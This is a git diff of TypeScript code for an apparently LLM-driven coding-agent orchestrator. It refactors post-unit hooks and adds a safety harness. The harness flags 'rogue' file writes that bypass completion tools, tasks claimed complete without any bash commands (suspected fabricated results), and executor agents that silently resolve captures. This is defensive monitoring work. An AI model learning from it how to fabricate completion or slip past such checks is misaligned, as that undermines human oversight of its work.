     // Prune dead bg-shell processes
-    try {
+    await runSafely("postUnit", "prune-bg-shell", async () => {
       const { pruneDeadProcesses } = await import("../bg-shell/process-manager.js");
       pruneDeadProcesses();
-    } catch (e) {
-      debugLog("postUnit", { phase: "prune-bg-shell", error: String(e) });
-    }
+    });
 
     // Tear down browser between units to prevent Chrome process accumulation (#1733)
-    try {
+    await runSafely("postUnit", "browser-teardown", async () => {
       const { getBrowser } = await import("../browser-tools/state.js");
       if (getBrowser()) {
         const { closeBrowser } = await import("../browser-tools/lifecycle.js");
         await closeBrowser();
         debugLog("postUnit", { phase: "browser-teardown", status: "closed" });
       }
-    } catch (e) {
-      debugLog("postUnit", { phase: "browser-teardown", error: String(e) });
-    }
+    });
 
     // Sync worktree state back to project root (skipped for lightweight sidecars)
     if (!opts?.skipWorktreeSync && s.originalBasePath && s.originalBasePath !== s.basePath) {
-      try {
-        syncStateToProjectRoot(s.basePath, s.originalBasePath, s.currentMilestoneId);
-      } catch (e) {
-        debugLog("postUnit", { phase: "worktree-sync", error: String(e) });
-      }
+      await runSafely("postUnit", "worktree-sync", () => {
+        syncStateToProjectRoot(s.basePath, s.originalBasePath!, s.currentMilestoneId);
+      });
     }
 
     // Rewrite-docs completion
     if (s.currentUnit.type === "rewrite-docs") {
-      try {
+      await runSafely("postUnit", "rewrite-docs-resolve", async () => {
         await resolveAllOverrides(s.basePath);
+        // Reset both disk and in-memory counters. Disk counter is authoritative
+        // (survives restarts); in-memory is kept in sync for the current session.
+        const { setRewriteCount } = await import("./auto-dispatch.js");
+        setRewriteCount(s.basePath, 0);
         s.rewriteAttemptCount = 0;
         ctx.ui.notify("Override(s) resolved — rewrite-docs completed.", "info");
-      } catch (e) {
-        debugLog("postUnit", { phase: "rewrite-docs-resolve", error: String(e) });
-      }
+      });
     }
 
     // Reactive state cleanup on slice completion
     if (s.currentUnit.type === "complete-slice") {
-      try {
-        const parts = s.currentUnit.id.split("/");
-        const [mid, sid] = parts;
+      await runSafely("postUnit", "reactive-state-cleanup", async () => {
+        const { milestone: mid, slice: sid } = parseUnitId(unit.id);
         if (mid && sid) {
           const { clearReactiveState } = await import("./reactive-graph.js");
           clearReactiveState(s.basePath, mid, sid);
         }
-      } catch (e) {
-        debugLog("postUnit", { phase: "reactive-state-cleanup", error: String(e) });
-      }
+      });
     }
 
     // Post-triage: execute actionable resolutions
@@ -348,13 +439,105 @@ export async function postUnitPreVerification(pctx: PostUnitContext, opts?: PreV
           );
         }
         for (const action of triageResult.actions) {
-          process.stderr.write(`gsd-triage: ${action}\n`);
+          logWarning("engine", `triage resolution: ${action}`);
         }
       } catch (err) {
-        process.stderr.write(`gsd-triage: resolution execution failed: ${(err as Error).message}\n`);
+        logError("engine", "triage resolution failed", { error: (err as Error).message });
       }
     }
 
+    // Rogue file detection — safety net for LLM bypassing completion tools (D003)
+    try {
+      const rogueFiles = detectRogueFileWrites(s.currentUnit.type, s.currentUnit.id, s.basePath);
+      for (const rogue of rogueFiles) {
+        logWarning("engine", "rogue file write detected", { path: rogue.path, unitId: rogue.unitId });
+        ctx.ui.notify(`Rogue file write detected: ${rogue.path}`, "warning");
+      }
+    } catch (e) {
+      debugLog("postUnit", { phase: "rogue-detection", error: String(e) });
+    }
+
+    // ── Safety harness: post-unit validation ──
+    try {
+      const { loadEffectiveGSDPreferences } = await import("./preferences.js");
+      const prefs = loadEffectiveGSDPreferences()?.preferences;
+      const safetyConfig = resolveSafetyHarnessConfig(
+        prefs?.safety_harness as Record<string, unknown> | undefined,
+      );
+
+      if (safetyConfig.enabled) {
+        const { milestone: sMid, slice: sSid, task: sTid } = parseUnitId(s.currentUnit.id);
+
+        // File change validation (execute-task only, after auto-commit)
+        if (safetyConfig.file_change_validation && s.currentUnit.type === "execute-task" && sMid && sSid && sTid && isDbAvailable()) {
+          try {
+            const taskRow = getTask(sMid, sSid, sTid);
+            if (taskRow) {
+              const expectedOutput = taskRow.expected_output ?? [];
+              const plannedFiles = taskRow.files ?? [];
+              const audit = validateFileChanges(s.basePath, expectedOutput, plannedFiles);
+              if (audit && audit.violations.length > 0) {
+                const warnings = audit.violations.filter(v => v.severity === "warning");
+                for (const v of warnings) {
+                  logWarning("safety", `file-change: ${v.file} — ${v.reason}`);
+                }
+                if (warnings.length > 0) {
+                  ctx.ui.notify(
+                    `Safety: ${warnings.length} unexpected file change(s) outside task plan`,
+                    "warning",
+                  );
+                }
+              }
+            }
+          } catch (e) {
+            debugLog("postUnit", { phase: "safety-file-change", error: String(e) });
+          }
+        }
+
+        // Evidence cross-reference (execute-task only)
+        // Verification evidence is passed via the complete-task tool call and
+        // stored in the SUMMARY.md on disk — not available as structured data
+        // in the DB. The evidence collector tracks actual bash tool calls, so
+        // we can still detect units that claimed success but ran no commands.
+        if (safetyConfig.evidence_cross_reference && s.currentUnit.type === "execute-task") {
+          try {
+            const actual = getEvidence();
+            const bashCalls = actual.filter(e => e.kind === "bash");
+            // If the task is marked complete but zero bash commands were run,
+            // it's suspicious — the LLM may have fabricated results.
+            if (sMid && sSid && sTid && isDbAvailable()) {
+              const taskRow = getTask(sMid, sSid, sTid);
+              if (taskRow?.status === "complete" && taskRow.verify && bashCalls.length === 0) {
+                logWarning("safety", "task marked complete with verification commands but no bash calls were executed");
+                ctx.ui.notify(
+                  `Safety: task ${sTid} has verification commands but no bash calls were recorded`,
+                  "warning",
+                );
+              }
+            }
+          } catch (e) {
+            debugLog("postUnit", { phase: "safety-evidence-xref", error: String(e) });
+          }
+        }
+
+        // Content validation (plan-slice, plan-milestone)
+        if (safetyConfig.content_validation) {
+          try {
+            const artifactPath = resolveArtifactForContent(s.currentUnit.type, s.currentUnit.id, s.basePath);
+            const contentViolations = validateContent(s.currentUnit.type, artifactPath);
+            for (const v of contentViolations) {
+              logWarning("safety", `content: ${v.reason}`);
+              ctx.ui.notify(`Content validation: ${v.reason}`, "warning");
+            }
+          } catch (e) {
+            debugLog("postUnit", { phase: "safety-content-validation", error: String(e) });
+          }
+        }
+      }
+    } catch (e) {
+      debugLog("postUnit", { phase: "safety-harness", error: String(e) });
+    }
+
     // Artifact verification
     let triggerArtifactVerified = false;
     if (!s.currentUnit.type.startsWith("hook/")) {
@@ -367,40 +550,105 @@ export async function postUnitPreVerification(pctx: PostUnitContext, opts?: PreV
         debugLog("postUnit", { phase: "artifact-verify", error: String(e) });
       }
 
+      // If verification failed, attempt to regenerate missing projection files
+      // from DB data before giving up (e.g. research-slice produces PLAN from engine).
+      if (!triggerArtifactVerified) {
+        try {
+          const { milestone: mid, slice: sid } = parseUnitId(s.currentUnit.id);
+          if (mid && sid) {
+            const regenerated = regenerateIfMissing(s.basePath, mid, sid, "PLAN");
+            if (regenerated) {
+              // Re-check after regeneration
+              triggerArtifactVerified = verifyExpectedArtifact(s.currentUnit.type, s.currentUnit.id, s.basePath);
+              if (triggerArtifactVerified) {
+                invalidateAllCaches();
+              }
+            }
+          }
+        } catch (e) {
+          debugLog("postUnit", { phase: "regenerate-projection", error: String(e) });
+        }
+      }
+
       // When artifact verification fails for a unit type that has a known expected
       // artifact, return "retry" so the caller re-dispatches with failure context
       // instead of blindly re-dispatching the same unit (#1571).
-      if (!triggerArtifactVerified) {
+      // After MAX_VERIFICATION_RETRIES, escalate to writeBlockerPlaceholder so the
+      // pipeline can advance instead of looping forever (#2653).
+      //
+      // HOWEVER, if the DB is unavailable (db_unavailable), the artifact was never
+      // written because the completion tool failed at the infra level. Retrying
+      // can never succeed and produces a costly re-dispatch loop (#2517).
+      if (!triggerArtifactVerified && !isDbAvailable()) {
+        // DB infra failure — do NOT retry; the completion tool returned
+        // db_unavailable so the artifact was never written. Retrying would
+        // produce an infinite re-dispatch loop (#2517).
+        debugLog("postUnit", { phase: "artifact-verify-skip-db-unavailable", unitType: s.currentUnit.type, unitId: s.currentUnit.id });
+        const dbSkipDiag = diagnoseExpectedArtifact(s.currentUnit.type, s.currentUnit.id, s.basePath);
+        ctx.ui.notify(
+          `Artifact missing for ${s.currentUnit.type} ${s.currentUnit.id} — DB unavailable, skipping retry.${dbSkipDiag ? ` Expected: ${dbSkipDiag}` : ""}`,
+          "error",
+        );
+      } else if (!triggerArtifactVerified) {
+        // #2883/#3595: If the artifact is missing because the tool invocation
+        // failed (malformed JSON) or was skipped (queued user message), retrying
+        // will produce the same failure. Pause auto-mode instead of looping.
+        if (s.lastToolInvocationError) {
+          const isUserSkip = /queued user message/i.test(s.lastToolInvocationError);
+          const errMsg = isUserSkip
+            ? `Tool skipped for ${s.currentUnit.type}: ${s.lastToolInvocationError}. Queued user message interrupted the turn — pausing auto-mode.`
+            : `Tool invocation failed for ${s.currentUnit.type}: ${s.lastToolInvocationError}. Structured argument generation failed — pausing auto-mode.`;
+          debugLog("postUnit", { phase: "tool-invocation-error-pause", unitType: s.currentUnit.type, unitId: s.currentUnit.id, error: s.lastToolInvocationError });
+          ctx.ui.notify(errMsg, "error");
+          s.lastToolInvocationError = null;
+          await pauseAuto(ctx, pi);
+          return "dispatched";
+        }
+
         const hasExpectedArtifact = resolveExpectedArtifactPath(s.currentUnit.type, s.currentUnit.id, s.basePath) !== null;
         if (hasExpectedArtifact) {
           const retryKey = `${s.currentUnit.type}:${s.currentUnit.id}`;
           const attempt = (s.verificationRetryCount.get(retryKey) ?? 0) + 1;
           s.verificationRetryCount.set(retryKey, attempt);
-          s.pendingVerificationRetry = {
-            unitId: s.currentUnit.id,
-            failureContext: `Artifact verification failed: expected artifact for ${s.currentUnit.type} "${s.currentUnit.id}" was not found on disk after unit execution (attempt ${attempt}).`,
-            attempt,
-          };
-          debugLog("postUnit", { phase: "artifact-verify-retry", unitType: s.currentUnit.type, unitId: s.currentUnit.id, attempt });
-          ctx.ui.notify(
-            `Artifact missing for ${s.currentUnit.type} ${s.currentUnit.id} — retrying (attempt ${attempt})`,
-            "warning",
-          );
-          return "retry";
+
+          if (attempt > MAX_VERIFICATION_RETRIES) {
+            // Retries exhausted — write a blocker placeholder so the pipeline
+            // can advance past this stuck unit (#2653).
+            debugLog("postUnit", {
+              phase: "artifact-verify-escalate",
+              unitType: s.currentUnit.type,
+              unitId: s.currentUnit.id,
+              attempt,
+              maxRetries: MAX_VERIFICATION_RETRIES,
+            });
+            const reason = `Artifact verification failed after ${MAX_VERIFICATION_RETRIES} retries for ${s.currentUnit.type} "${s.currentUnit.id}".`;
+            writeBlockerPlaceholder(s.currentUnit.type, s.currentUnit.id, s.basePath, reason);
+            ctx.ui.notify(
+              `${s.currentUnit.type} ${s.currentUnit.id} — verification retries exhausted (${MAX_VERIFICATION_RETRIES}), wrote blocker placeholder to advance pipeline`,
+              "warning",
+            );
+            // Reset retry count and fall through to "continue" so the loop
+            // re-derives state with the placeholder in place.
+            s.verificationRetryCount.delete(retryKey);
+            s.pendingVerificationRetry = null;
+            // Do NOT return "retry" — fall through to "continue" below.
+          } else {
+            s.pendingVerificationRetry = {
+              unitId: s.currentUnit.id,
+              failureContext: `Artifact verification failed: expected artifact for ${s.currentUnit.type} "${s.currentUnit.id}" was not found on disk after unit execution (attempt ${attempt}).`,
+              attempt,
+            };
+            debugLog("postUnit", { phase: "artifact-verify-retry", unitType: s.currentUnit.type, unitId: s.currentUnit.id, attempt });
+            ctx.ui.notify(
+              `Artifact missing for ${s.currentUnit.type} ${s.currentUnit.id} — retrying (attempt ${attempt})`,
+              "warning",
+            );
+            return "retry";
+          }
         }
       }
     } else {
-      // Hook unit completed — finalize its runtime record
-      try {
-        writeUnitRuntimeRecord(s.basePath, s.currentUnit.type, s.currentUnit.id, s.currentUnit.startedAt, {
-          phase: "finalized",
-          progressCount: 1,
-          lastProgressKind: "hook-completed",
-        });
-        clearUnitRuntimeRecord(s.basePath, s.currentUnit.type, s.currentUnit.id);
-      } catch (e) {
-        debugLog("postUnit", { phase: "hook-finalize", error: String(e) });
-      }
+      // Hook unit completed — no additional processing needed
     }
   }
 
@@ -422,13 +670,32 @@ export async function postUnitPreVerification(pctx: PostUnitContext, opts?: PreV
 export async function postUnitPostVerification(pctx: PostUnitContext): Promise<"continue" | "step-wizard" | "stopped"> {
   const { s, ctx, pi, buildSnapshotOpts, lockBase, stopAuto, pauseAuto, updateProgressWidget } = pctx;
 
-  // ── DB dual-write ──
-  if (isDbAvailable()) {
+  if (s.currentUnit) {
     try {
-      const { migrateFromMarkdown } = await import("./md-importer.js");
-      migrateFromMarkdown(s.basePath);
-    } catch (err) {
-      process.stderr.write(`gsd-db: re-import failed: ${(err as Error).message}\n`);
+      const codebasePrefs = loadEffectiveGSDPreferences()?.preferences?.codebase;
+      const refresh = ensureCodebaseMapFresh(
+        s.basePath,
+        codebasePrefs
+          ? {
+              excludePatterns: codebasePrefs.exclude_patterns,
+              maxFiles: codebasePrefs.max_files,
+              collapseThreshold: codebasePrefs.collapse_threshold,
+            }
+          : undefined,
+        { force: true, ttlMs: 0 },
+      );
+      if (refresh.status === "generated" || refresh.status === "updated") {
+        debugLog("postUnit", {
+          phase: "codebase-refresh",
+          unitType: s.currentUnit.type,
+          unitId: s.currentUnit.id,
+          status: refresh.status,
+          fileCount: refresh.fileCount,
+          reason: refresh.reason,
+        });
+      }
+    } catch (e) {
+      logWarning("engine", `CODEBASE refresh failed: ${(e as Error).message}`);
     }
   }
 
@@ -441,23 +708,11 @@ export async function postUnitPostVerification(pctx: PostUnitContext): Promise<"
       }
       persistHookState(s.basePath);
 
-      s.sidecarQueue.push({
-        kind: "hook",
-        unitType: hookUnit.unitType,
-        unitId: hookUnit.unitId,
-        prompt: hookUnit.prompt,
-        model: hookUnit.model,
-      });
-
-      debugLog("postUnitPostVerification", {
-        phase: "sidecar-enqueue",
-        kind: "hook",
-        unitType: hookUnit.unitType,
-        unitId: hookUnit.unitId,
-        hookName: hookUnit.hookName,
-      });
-
-      return "continue";
+      return enqueueSidecar(
+        s, ctx,
+        { kind: "hook", unitType: hookUnit.unitType, unitId: hookUnit.unitId, prompt: hookUnit.prompt, model: hookUnit.model },
+        { hookName: hookUnit.hookName },
+      );
     }
 
     // Check if a hook requested a retry of the trigger unit
@@ -471,12 +726,18 @@ export async function postUnitPostVerification(pctx: PostUnitContext): Promise<"
 
         // ── State reset: undo the completion so deriveState re-derives the unit ──
         try {
-          const parts = trigger.unitId.split("/");
-          const [mid, sid, tid] = parts;
+          const { milestone: mid, slice: sid, task: tid } = parseUnitId(trigger.unitId);
 
-          // 1. Uncheck [x] → [ ] in PLAN.md
+          // 1. Reset task status in DB and re-render plan checkboxes
           if (mid && sid && tid) {
-            uncheckTaskInPlan(s.basePath, mid, sid, tid);
+            try {
+              updateTaskStatus(mid, sid, tid, "pending");
+              await renderPlanCheckboxes(s.basePath, mid, sid);
+            } catch (dbErr) {
+              // DB unavailable — fail explicitly rather than silently reverting to markdown mutation.
+              // Use 'gsd recover' to rebuild DB state from disk if needed.
+              logError("engine", `retry state-reset failed (DB unavailable): ${(dbErr as Error).message}. Run 'gsd recover' to reconcile.`);
+            }
           }
 
           // 2. Delete SUMMARY.md for the task
@@ -490,17 +751,7 @@ export async function postUnitPostVerification(pctx: PostUnitContext): Promise<"
             }
           }
 
-          // 3. Remove from s.completedUnits and flush to completed-units.json
-          s.completedUnits = s.completedUnits.filter(
-            u => !(u.type === trigger.unitType && u.id === trigger.unitId),
-          );
-          try {
-            const completedKeysPath = join(gsdRoot(s.basePath), "completed-units.json");
-            const keys = s.completedUnits.map(u => `${u.type}/${u.id}`);
-            atomicWriteSync(completedKeysPath, JSON.stringify(keys, null, 2));
-          } catch { /* non-fatal: disk flush failure */ }
-
-          // 4. Delete the retry_on artifact (e.g. NEEDS-REWORK.md)
+          // 3. Delete the retry_on artifact (e.g. NEEDS-REWORK.md)
           if (trigger.retryArtifact) {
             const retryArtifactPath = resolveHookArtifactPath(s.basePath, trigger.unitId, trigger.retryArtifact);
             if (existsSync(retryArtifactPath)) {
@@ -519,6 +770,170 @@ export async function postUnitPostVerification(pctx: PostUnitContext): Promise<"
     }
   }
 
+  // ── Fast-path stop detection (#3487) ──
+  // Before waiting for triage, check if any PENDING captures contain explicit
+  // stop/halt language. If so, pause immediately — don't wait for triage.
+  if (s.currentUnit && s.currentUnit.type !== "triage-captures") {
+    try {
+      const pending = loadPendingCaptures(s.basePath);
+      // Match only when the capture text starts with a stop/halt directive word,
+      // or the entire text is short and dominated by such a word. This avoids
+      // false positives on captures like "add a pause button" or "stop the timer
+      // from re-rendering" — those are feature descriptions, not halt directives.
+      const STOP_PATTERN = /^(stop|halt|abort|don'?t continue|pause|cease)\b/i;
+      const stopCapture = pending.find(c => STOP_PATTERN.test(c.text.trim()));
+      if (stopCapture) {
+        ctx.ui.notify(
+          `Stop directive detected in pending capture ${stopCapture.id}: "${stopCapture.text}" — pausing auto-mode.`,
+          "warning",
+        );
+        debugLog("postUnit", { phase: "fast-stop", captureId: stopCapture.id });
+        await pauseAuto(ctx, pi);
+        return "stopped";
+      }
+    } catch (e) {
+      debugLog("postUnit", { phase: "fast-stop-error", error: String(e) });
+    }
+  }
+
+  // ── Capture protection: revert executor-silenced captures (#3487) ──
+  // Non-triage agents can write **Status:** resolved to CAPTURES.md, bypassing
+  // the triage pipeline. Revert those to pending before the triage check.
+  if (
+    s.currentUnit &&
+    s.currentUnit.type !== "triage-captures"
+  ) {
+    try {
+      const reverted = revertExecutorResolvedCaptures(s.basePath);
+      if (reverted > 0) {
+        debugLog("postUnit", { phase: "capture-protection", reverted });
+        ctx.ui.notify(
+          `Reverted ${reverted} capture${reverted === 1 ? "" : "s"} silenced by executor — re-queuing for triage.`,
+          "warning",
+        );
+      }
+    } catch (e) {
+      debugLog("postUnit", { phase: "capture-protection-error", error: String(e) });
+    }
+  }
+
+  // ── Pre-execution checks (after plan-slice completes) ──
+  if (
+    s.currentUnit &&
+    s.currentUnit.type === "plan-slice"
+  ) {
+    let preExecPauseNeeded = false;
+    await runSafely("postUnitPostVerification", "pre-execution-checks", async () => {
+      try {
+        // Check preferences — respect enhanced_verification and enhanced_verification_pre
+        const prefs = loadEffectiveGSDPreferences()?.preferences;
+        const enhancedEnabled = prefs?.enhanced_verification !== false; // default true
+        const preEnabled = prefs?.enhanced_verification_pre !== false;  // default true
+
+        if (!enhancedEnabled || !preEnabled) {
+          debugLog("postUnitPostVerification", {
+            phase: "pre-execution-checks",
+            skipped: true,
+            reason: "disabled by preferences",
+          });
+          return;
+        }
+
+        // Parse the unit ID to get milestone/slice IDs
+        const { milestone: mid, slice: sid } = parseUnitId(s.currentUnit!.id);
+        if (!mid || !sid) {
+          debugLog("postUnitPostVerification", {
+            phase: "pre-execution-checks",
+            skipped: true,
+            reason: "could not parse milestone/slice from unit ID",
+          });
+          return;
+        }
+
+        // Get tasks for this slice from DB
+        const tasks = getSliceTasks(mid, sid);
+        if (tasks.length === 0) {
+          debugLog("postUnitPostVerification", {
+            phase: "pre-execution-checks",
+            skipped: true,
+            reason: "no tasks found for slice",
+          });
+          return;
+        }
+
+        // Run pre-execution checks
+        const result: PreExecutionResult = await runPreExecutionChecks(tasks, s.basePath);
+
+        // Log summary to stderr in existing verification output format
+        const emoji = result.status === "pass" ? "✅" : result.status === "warn" ? "⚠️" : "❌";
+        process.stderr.write(
+          `gsd-pre-exec: ${emoji} Pre-execution checks ${result.status} for ${mid}/${sid} (${result.durationMs}ms)\n`,
+        );
+
+        // Log individual check results
+        for (const check of result.checks) {
+          const checkEmoji = check.passed ? "✓" : check.blocking ? "✗" : "⚠";
+          process.stderr.write(
+            `gsd-pre-exec:   ${checkEmoji} [${check.category}] ${check.target}: ${check.message}\n`,
+          );
+        }
+
+        // Write evidence JSON to slice artifacts directory
+        const slicePath = resolveSlicePath(s.basePath, mid, sid);
+        if (slicePath) {
+          writePreExecutionEvidence(result, slicePath, mid, sid);
+        }
+
+        // Notify UI
+        if (result.status === "fail") {
+          const blockingCount = result.checks.filter(c => !c.passed && c.blocking).length;
+          ctx.ui.notify(
+            `Pre-execution checks failed: ${blockingCount} blocking issue${blockingCount === 1 ? "" : "s"} found`,
+            "error",
+          );
+          preExecPauseNeeded = true;
+        } else if (result.status === "warn") {
+          ctx.ui.notify(
+            `Pre-execution checks passed with warnings`,
+            "warning",
+          );
+          // Strict mode: treat warnings as blocking
+          if (prefs?.enhanced_verification_strict === true) {
+            preExecPauseNeeded = true;
+          }
+        }
+
+        debugLog("postUnitPostVerification", {
+          phase: "pre-execution-checks",
+          status: result.status,
+          checkCount: result.checks.length,
+          durationMs: result.durationMs,
+        });
+      } catch (preExecError) {
+        // Fail-closed: if runPreExecutionChecks throws, pause auto-mode instead of silently continuing
+        const errorMessage = preExecError instanceof Error ? preExecError.message : String(preExecError);
+        debugLog("postUnitPostVerification", {
+          phase: "pre-execution-checks",
+          error: errorMessage,
+          failClosed: true,
+        });
+        logError("engine", `gsd-pre-exec: Pre-execution checks threw an error: ${errorMessage}`);
+        ctx.ui.notify(
+          `Pre-execution checks error: ${errorMessage} — pausing for human review`,
+          "error",
+        );
+        preExecPauseNeeded = true;
+      }
+    });
+
+    // Check for blocking failures after runSafely completes
+    if (preExecPauseNeeded) {
+      debugLog("postUnitPostVerification", { phase: "pre-execution-checks", pausing: true, reason: "blocking failures detected" });
+      await pauseAuto(ctx, pi);
+      return "stopped";
+    }
+  }
+
   // ── Triage check ──
   if (
     !s.stepMode &&
@@ -558,26 +973,12 @@ export async function postUnitPostVerification(pctx: PostUnitContext): Promise<"
             }
 
             const triageUnitId = `${mid}/${sid}/triage`;
-            s.sidecarQueue.push({
-              kind: "triage",
-              unitType: "triage-captures",
-              unitId: triageUnitId,
-              prompt,
-            });
-
-            debugLog("postUnitPostVerification", {
-              phase: "sidecar-enqueue",
-              kind: "triage",
-              unitId: triageUnitId,
-              pendingCount: pending.length,
-            });
-
-            ctx.ui.notify(
+            return enqueueSidecar(
+              s, ctx,
+              { kind: "triage", unitType: "triage-captures", unitId: triageUnitId, prompt },
+              { pendingCount: pending.length },
               `Triaging ${pending.length} pending capture${pending.length === 1 ? "" : "s"}...`,
-              "info",
             );
-
-            return "continue";
           }
         }
       }
@@ -606,27 +1007,12 @@ export async function postUnitPostVerification(pctx: PostUnitContext): Promise<"
       markCaptureExecuted(s.basePath, capture.id);
 
       const qtUnitId = `${s.currentMilestoneId}/${capture.id}`;
-      s.sidecarQueue.push({
-        kind: "quick-task",
-        unitType: "quick-task",
-        unitId: qtUnitId,
-        prompt,
-        captureId: capture.id,
-      });
-
-      debugLog("postUnitPostVerification", {
-        phase: "sidecar-enqueue",
-        kind: "quick-task",
-        unitId: qtUnitId,
-        captureId: capture.id,
-      });
-
-      ctx.ui.notify(
+      return enqueueSidecar(
+        s, ctx,
+        { kind: "quick-task", unitType: "quick-task", unitId: qtUnitId, prompt, captureId: capture.id },
+        { captureId: capture.id },
         `Executing quick-task: ${capture.id} — "${capture.text}"`,
-        "info",
       );
-
-      return "continue";
     } catch (e) {
       debugLog("postUnit", { phase: "quick-task-dispatch", error: String(e) });
     }
diff --git a/src/resources/extensions/gsd/auto-prompts.ts b/src/resources/extensions/gsd/auto-prompts.ts
index 94d24facf..5e8bff3c4 100644
--- a/src/resources/extensions/gsd/auto-prompts.ts
+++ b/src/resources/extensions/gsd/auto-prompts.ts
@@ -6,8 +6,9 @@
  * utility.
  */
 
-import { loadFile, parseContinue, parsePlan, parseRoadmap, parseSummary, extractUatType, loadActiveOverrides, formatOverridesSection, parseTaskPlanFile } from "./files.js";
+import { loadFile, parseContinue, parseSummary, loadActiveOverrides, formatOverridesSection, parseTaskPlanFile } from "./files.js";
 import type { Override, UatType } from "./files.js";
+import { hasVerdict, getUatType } from "./verdict-parser.js";
 import { loadPrompt, inlineTemplate } from "./prompt-loader.js";
 import {
   resolveMilestoneFile, resolveSliceFile, resolveSlicePath,
@@ -16,13 +17,17 @@ import {
   resolveGsdRootFile, relGsdRootFile, resolveRuntimeFile,
 } from "./paths.js";
 import { resolveSkillDiscoveryMode, resolveInlineLevel, loadEffectiveGSDPreferences, resolveAllSkillReferences } from "./preferences.js";
+import { parseRoadmap } from "./parsers-legacy.js";
 import type { GSDState, InlineLevel } from "./types.js";
 import type { GSDPreferences } from "./preferences.js";
 import { getLoadedSkills, type Skill } from "@gsd/pi-coding-agent";
 import { join, basename } from "node:path";
 import { existsSync } from "node:fs";
 import { computeBudgets, resolveExecutorContextWindow, truncateAtSectionBoundary } from "./context-budget.js";
+import { getPendingGates } from "./gsd-db.js";
 import { formatDecisionsCompact, formatRequirementsCompact } from "./structured-data-formatter.js";
+import { readPhaseAnchor, formatAnchorForPrompt } from "./phase-anchor.js";
+import { logWarning } from "./workflow-logger.js";
 
 // ─── Preamble Cap ─────────────────────────────────────────────────────────────
 
@@ -45,7 +50,8 @@ function formatExecutorConstraints(): string {
   try {
     const prefs = loadEffectiveGSDPreferences();
     windowTokens = resolveExecutorContextWindow(undefined, prefs?.preferences);
-  } catch {
+  } catch (e) {
+    logWarning("prompt", `resolveExecutorContextWindow failed: ${(e as Error).message}`);
     windowTokens = 200_000; // safe default
   }
   const budgets = computeBudgets(windowTokens);
@@ -84,6 +90,11 @@ function buildSourceFilePaths(
     paths.push(`- **Decisions**: \`${relGsdRootFile("DECISIONS")}\``);
   }
 
+  const queuePath = resolveGsdRootFile(base, "QUEUE");
+  if (existsSync(queuePath)) {
+    paths.push(`- **Queue**: \`${relGsdRootFile("QUEUE")}\``);
+  }
+
   const contextPath = resolveMilestoneFile(base, mid, "CONTEXT");
   if (contextPath) {
     paths.push(`- **Milestone Context**: \`${relMilestoneFile(base, mid, "CONTEXT")}\``);
@@ -177,17 +188,43 @@ export async function inlineFileSmart(
 export async function inlineDependencySummaries(
   mid: string, sid: string, base: string, budgetChars?: number,
 ): Promise<string> {
-  const roadmapFile = resolveMilestoneFile(base, mid, "ROADMAP");
-  const roadmapContent = roadmapFile ? await loadFile(roadmapFile) : null;
-  if (!roadmapContent) return "- (no dependencies)";
+  // DB primary path — get slice depends directly
+  let depends: string[] | null = null;
+  try {
+    const { isDbAvailable, getSlice } = await import("./gsd-db.js");
+    if (isDbAvailable()) {
+      const slice = getSlice(mid, sid);
+      if (slice) {
+        if (slice.depends.length === 0) return "- (no dependencies)";
+        depends = slice.depends as string[];
+      }
+      // If slice not found in DB, fall through to file-based parsing
+    }
+  } catch (err) {
+    logWarning("prompt", `inlineDependencySummaries DB lookup failed: ${err instanceof Error ? err.message : String(err)}`);
+  }
 
-  const roadmap = parseRoadmap(roadmapContent);
-  const sliceEntry = roadmap.slices.find(s => s.id === sid);
-  if (!sliceEntry || sliceEntry.depends.length === 0) return "- (no dependencies)";
+  // If DB didn't provide depends, fall back to roadmap parsing
+  if (!depends) {
+    const roadmapPath = resolveMilestoneFile(base, mid, "ROADMAP");
+    if (roadmapPath) {
+      const roadmapContent = await loadFile(roadmapPath);
+      if (roadmapContent) {
+        const parsed = parseRoadmap(roadmapContent);
+        const slice = parsed.slices.find(s => s.id === sid);
+        if (slice && slice.depends.length > 0) {
+          depends = slice.depends;
+        }
+      }
+    }
+    if (!depends) {
+      return "- (no dependencies)";
+    }
+  }
 
   const sections: string[] = [];
   const seen = new Set<string>();
-  for (const dep of sliceEntry.depends) {
+  for (const dep of depends) {
     if (seen.has(dep)) continue;
     seen.add(dep);
     const summaryFile = resolveSliceFile(base, mid, dep, "SUMMARY");
@@ -224,7 +261,12 @@ export async function inlineGsdRootFile(
 
 /**
  * Inline decisions with optional milestone scoping from the DB.
- * Falls back to filesystem via inlineGsdRootFile when DB unavailable or empty.
+ * Falls back to filesystem via inlineGsdRootFile only when DB is unavailable.
+ *
+ * Cascade logic (R005):
+ * 1. Query with { milestoneId, scope } if scope provided
+ * 2. If empty AND scope was provided, retry with { milestoneId } only (drop scope)
+ * 3. If still empty, return null (intentional per D020)
  */
 export async function inlineDecisionsFromDb(
   base: string, milestoneId?: string, scope?: string, level?: InlineLevel,
@@ -234,7 +276,15 @@ export async function inlineDecisionsFromDb(
     const { isDbAvailable } = await import("./gsd-db.js");
     if (isDbAvailable()) {
       const { queryDecisions, formatDecisionsForPrompt } = await import("./context-store.js");
-      const decisions = queryDecisions({ milestoneId, scope });
+
+      // First query: try with both milestoneId and scope (if scope provided)
+      let decisions = queryDecisions({ milestoneId, scope });
+
+      // Cascade: if empty AND scope was provided, retry without scope
+      if (decisions.length === 0 && scope) {
+        decisions = queryDecisions({ milestoneId });
+      }
+
       if (decisions.length > 0) {
         // Use compact format for non-full levels to save ~35% tokens
         const formatted = inlineLevel !== "full"
@@ -242,26 +292,29 @@ export async function inlineDecisionsFromDb(
           : formatDecisionsForPrompt(decisions);
         return `### Decisions\nSource: \`.gsd/DECISIONS.md\`\n\n${formatted}`;
       }
+      // DB available but cascade returned empty — intentional per D020, don't fall back to file
+      return null;
     }
-  } catch {
-    // DB not available — fall through to filesystem
+  } catch (err) {
+    logWarning("prompt", `inlineDecisionsFromDb failed: ${err instanceof Error ? err.message : String(err)}`);
   }
+  // DB unavailable — fall back to filesystem
   return inlineGsdRootFile(base, "decisions.md", "Decisions");
 }
 
 /**
- * Inline requirements with optional slice scoping from the DB.
+ * Inline requirements with optional milestone and slice scoping from the DB.
  * Falls back to filesystem via inlineGsdRootFile when DB unavailable or empty.
  */
 export async function inlineRequirementsFromDb(
-  base: string, sliceId?: string, level?: InlineLevel,
+  base: string, milestoneId?: string, sliceId?: string, level?: InlineLevel,
 ): Promise<string | null> {
   const inlineLevel = level ?? resolveInlineLevel();
   try {
     const { isDbAvailable } = await import("./gsd-db.js");
     if (isDbAvailable()) {
       const { queryRequirements, formatRequirementsForPrompt } = await import("./context-store.js");
-      const requirements = queryRequirements({ sliceId });
+      const requirements = queryRequirements({ milestoneId, sliceId });
       if (requirements.length > 0) {
